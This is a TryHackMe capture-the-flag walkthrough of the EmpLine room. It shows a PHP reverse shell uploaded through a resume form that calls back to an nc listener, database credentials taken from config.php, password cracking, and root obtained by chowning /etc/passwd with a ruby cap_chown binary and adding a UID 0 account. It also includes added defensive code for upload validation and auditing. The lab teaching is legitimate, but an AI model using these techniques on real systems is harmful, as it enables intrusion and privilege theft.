EmpLine | TryHackMe

Octothorp
6 min read · Sep 18, 2021

EmpLine is a free TryHackMe room created by zyeinn, which means anyone can connect and start hacking on it.

There isn't much of a brief for the room: deploy the machine, then submit user.txt and root.txt.

Let's start with a basic nmap scan and see what we can find.

nmap -sS -T4 -sV -sC $ip
(screenshot: nmap scan output)

From the nmap scan above we can see that the host is listening on 22/SSH, 80/HTTP and 3306/MySQL (running MariaDB).

So first let's take a look at the web page on TCP port 80.

(screenshot: EmpLine default web page)

After a bit of browsing on the site we can see that the EMPLOYMENT link points to a virtual host, job.empline.thm/careers, so we will need to add it to our /etc/hosts file if we want to browse to it.

10.10.10.10   job.empline.thm empline.thm

Going to the careers page we find a link for current open positions that we can follow.

This then leads us to a job opening we can apply for by clicking on the Mobile Dev link.

This page allows us to apply for the job by submitting our resume. Let's see if we can submit a PHP reverse shell instead. We can use php-reverse-shell.php from pentestmonkey; this file is also available on the TryHackMe attack box, as shown below.

cp /usr/share/webshells/php/php-reverse-shell.php ./
vi php-reverse-shell.php

Now we just need to update the $ip and $port variables in the script to point back to our attack box.

Now we upload the modified php-reverse-shell.php to the webpage.
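From the defender's side, the reason this upload works is that the careers form accepts a .php file and stores it under a directory the web server will serve and execute from. The following is an added example, not OpenCats code and not part of the original write-up, of the checks an upload handler should make before it stores anything: pick the extension from the last dot only, allowlist the types the form actually needs, confirm the leading bytes match that type, refuse polyglots that carry script markup, and write the file under a random name in a directory outside the webroot. The allowed types, the size limit and the upload_root directory are assumptions of the example.

```python
import os
import secrets

# Resume types the form is assumed to need: extension -> leading "magic" bytes.
# (Assumption for this example; the real form's policy is not on the page.)
ALLOWED_TYPES = {
    ".pdf": b"%PDF-",
    ".docx": b"PK\x03\x04",  # OOXML documents are zip containers
}
MAX_BYTES = 5 * 1024 * 1024
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")


class UploadRejected(ValueError):
    """Raised when an upload fails validation; the message says why."""


def validate_resume(filename: str, data: bytes) -> str:
    """Return the accepted extension for this upload or raise UploadRejected.

    The client-supplied name is only used to pick the extension; it is never
    reused on disk, so 'shell.php' or 'cv.pdf.php' can never be stored as a
    script the web server would execute.
    """
    if len(data) > MAX_BYTES:
        raise UploadRejected("file too large")
    base = os.path.basename(filename.replace("\\", "/"))  # drop any directory part
    ext = os.path.splitext(base)[1].lower()               # splits on the LAST dot
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension {ext!r} is not allowed")
    if not data.startswith(ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match the declared type")
    if any(marker in data for marker in SCRIPT_MARKERS):
        raise UploadRejected("embedded script markup")  # PDF/PHP polyglot
    return ext


def is_accepted(filename: str, data: bytes) -> bool:
    """Convenience wrapper: True if the upload would be stored."""
    try:
        validate_resume(filename, data)
        return True
    except UploadRejected:
        return False


def store_resume(filename: str, data: bytes, upload_root: str) -> str:
    """Validate, then save under a random name in a directory outside the webroot.

    upload_root is assumed to be a path the web server neither serves nor
    executes from; the returned path is what the application should record.
    """
    ext = validate_resume(filename, data)
    path = os.path.join(upload_root, secrets.token_hex(16) + ext)
    with open(path, "wb") as fh:
        fh.write(data)
    os.chmod(path, 0o640)  # data, never executable
    return path


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as root:
        print(store_resume("cv.pdf", b"%PDF-1.4\n%constructed sample\n", root))
        for name, body in [("php-reverse-shell.php", b"<?php /* ... */ ?>"),
                           ("cv.pdf.php", b"%PDF-1.4"),
                           ("cv.pdf", b"%PDF-1.4 <?php echo 1; ?>")]:
            print(name, "accepted" if is_accepted(name, body) else "rejected")
```

The random on-disk name is the part that matters most: even if a check above is bypassed, the attacker no longer knows the URL of the stored file, and because the upload directory is not under the webroot there is no URL to browse to in the first place.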

Start a listener on our attack box via nc -lnvp 666 as shown below.

Now we need to execute the php-reverse-shell.php file we uploaded. Looking at the OpenCats open source project on GitHub we can see where these files are uploaded to.

Now we just need to browse to that directory on the server and see if we can execute our php-reverse-shell.php.

Perfect, we have access to the directory and can see our php-reverse-shell.php file.

With our nc listener running we can click on the link and catch our reverse shell.

We can see that we are running as www-data and have a simple shell, which we will upgrade via Python.

(screenshot: reverse shell caught by the nc listener)

First we start an interactive shell with Python via python3 -c 'import pty;pty.spawn("/bin/bash")'. In order to make this shell fully usable we need to background it with ctrl-z, then type stty raw -echo && fg and press enter. For a better explanation you can read about the process on ropnop's blog.

After inspecting config.php in /var/www/opencats we can find some database credentials.

(screenshot: database credentials in config.php)

Using these credentials we should be able to connect to the database instance on port 3306 we found in our nmap scan at the beginning.

mysql -uusername -p -h10.10.10.10
-u is the username (if the name was bob you would use -ubob)
-p denotes that you will be prompted for the password
-h specifies the IP address of the remote DB host to connect to
(screenshot: mysql connection)

After some poking around we can find the password hashes for 3 accounts in the database.

(screenshot: password hashes from the database)

After copying the hashes to a file we can use John the Ripper to attempt to crack them.

(screenshot: John the Ripper output)

Now that we have a username and password we may be able to connect to the box via SSH.

(screenshot: user.txt)

Success! We have the user.txt flag.

After a bit of poking around I couldn't find an easy way to escalate to root, so I decided to upload linpeas.sh and see what it could find on the box.

scp $(locate linpeas.sh) usernameyoufound@10.10.103.182:./

Once linpeas.sh is on the box we have to change it to be executable and run it. This can be accomplished by chmod +x linpeas.sh && ./linpeas.sh

Once it completes we can see that the /usr/local/bin/ruby executable has been granted an additional file capability (cap_chown), allowing it to change the ownership of files.

In the screenshot below I can see that /etc/passwd is currently owned by root. But if I call ruby and perform a chown method on the /etc/passwd file I should be able to make my user account the owner.

ruby -e 'File.chown(1002,1002,"/etc/passwd")'

Now that we are the owners of /etc/passwd we can edit the file and add in a new account with root privileges.

First we need an unsalted password hash, which we can create with mkpasswd on our attack box.

If we add a new user at the bottom of the /etc/passwd file using the password hash we created above, all we need to do is set the UID and GID fields to 0 and that account will be a root user.

Once we save /etc/passwd with the new account that has a UID and GID of zero we can just switch to it with the su command.
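For anyone auditing a box like this rather than attacking it, the two things worth checking are exactly the findings above: a file capability such as cap_chown on a binary that has no need for it, and an /etc/passwd entry that is not root yet carries UID or GID 0 (or a hash in the password field instead of the usual x). The script below is an added example, not part of this write-up and not linpeas code; the getcap and passwd lines it parses are constructed samples, and the list of capabilities it treats as risky is the example's own short list rather than anything authoritative.

```python
from typing import Dict, List, Set, Tuple

# Capabilities that let a binary change file ownership or process identity;
# any of these on a path that does not need it deserves a look. (Short
# reviewer's list, an assumption of this example, not an exhaustive one.)
RISKY_CAPS = {"cap_chown", "cap_setuid", "cap_setgid", "cap_dac_override",
              "cap_fowner", "cap_sys_admin"}

# Password-field values meaning "hash lives in /etc/shadow" or "login disabled".
SHADOW_PLACEHOLDERS = {"x", "*", "!", "!!"}

# Constructed sample data in the shape of `getcap -r / 2>/dev/null` output and
# of /etc/passwd; nothing here is captured from the room.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/local/bin/ruby = cap_chown+ep
"""
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
ctfuser:x:1002:1002::/home/ctfuser:/bin/bash
backdoor:$6$constructed$notarealhash:0:0::/root:/bin/bash
"""


def parse_getcap(output: str) -> Dict[str, Set[str]]:
    """Map each path in getcap output to the capability names it carries.

    Handles both 'path = cap_a,cap_b+ep' (libcap 2.x) and 'path cap_a=ep'
    (newer libcap) line shapes.
    """
    result: Dict[str, Set[str]] = {}
    for line in output.splitlines():
        line = line.strip()
        if not line or " " not in line:
            continue
        if " = " in line:
            path, spec = line.split(" = ", 1)
        else:
            path, spec = line.rsplit(" ", 1)
        names: Set[str] = set()
        for group in spec.split(","):
            # strip the '+ep' / '=ep' flag suffix, keep the capability name
            name = group.split("+", 1)[0].split("=", 1)[0].strip()
            if name:
                names.add(name)
        result[path.strip()] = names
    return result


def risky_capabilities(output: str) -> Dict[str, Set[str]]:
    """Return only the paths that carry a capability from RISKY_CAPS."""
    return {path: caps & RISKY_CAPS
            for path, caps in parse_getcap(output).items() if caps & RISKY_CAPS}


def passwd_anomalies(passwd_text: str) -> List[Tuple[str, str]]:
    """Flag /etc/passwd entries that look like a planted root account."""
    findings: List[Tuple[str, str]] = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # blank, comment or malformed line
        user, pw, uid, gid = fields[0], fields[1], fields[2], fields[3]
        try:
            uid_n, gid_n = int(uid), int(gid)
        except ValueError:
            findings.append((user, "non-numeric UID/GID"))
            continue
        if uid_n == 0 and user != "root":
            findings.append((user, "UID 0 but not root"))
        if gid_n == 0 and user != "root":
            findings.append((user, "GID 0 but not root"))
        if pw == "":
            findings.append((user, "empty password field"))
        elif pw not in SHADOW_PLACEHOLDERS:
            findings.append((user, "password hash stored in /etc/passwd rather than /etc/shadow"))
    return findings


if __name__ == "__main__":
    for path, caps in risky_capabilities(SAMPLE_GETCAP).items():
        print(f"{path}: {', '.join(sorted(caps))}")
    for user, reason in passwd_anomalies(SAMPLE_PASSWD):
        print(f"{user}: {reason}")
```

On a live host you would feed the functions the real output of getcap -r / and the contents of /etc/passwd, and pair the second check with a look at the file's owner and mode (it should be root-owned and 0644), since a non-root owner of /etc/passwd is the precondition the chown above creates.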

And we have the root.txt proof.

Thank you to zyeinn for such a fun room to play around in!
